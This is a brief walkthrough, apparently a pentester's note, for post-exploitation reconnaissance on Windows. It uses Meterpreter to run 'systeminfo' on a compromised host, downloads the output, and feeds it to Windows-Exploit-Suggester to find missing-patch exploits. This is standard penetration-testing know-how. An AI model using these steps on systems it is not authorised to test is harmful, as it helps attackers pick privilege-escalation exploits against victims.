This script is to find out about available exploits in Windows.
1. Gather system information from meterpreter.
execute -f => to run cmd commands
cmd.exe /c systeminfo => open cmd and execute the command systeminfo
>> systeminfo.txt => create a file and append the output to it
- execute -f “cmd.exe /c systeminfo >> systeminfo.txt”
2. Download the file systeminfo.txt we just created into Kali/Parrot Linux.
- download systeminfo.txt
Now we have system info to work with
3. Download, update, and install required libraries to run the script.
- git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
- cd Windows-Exploit-Suggester
- python2 windows-exploit-suggester.py –update
In my environment I had to install xlrd (pip install xlrd & pip install xlrd –upgrade)
4. Analyze the systeminfo.txt file we downloaded from the host with windows-exploit-suggester
- ./windows-exploit-suggester.py –database 2019-010-26-mssb.xlsx –systeminfo systeminfo.txt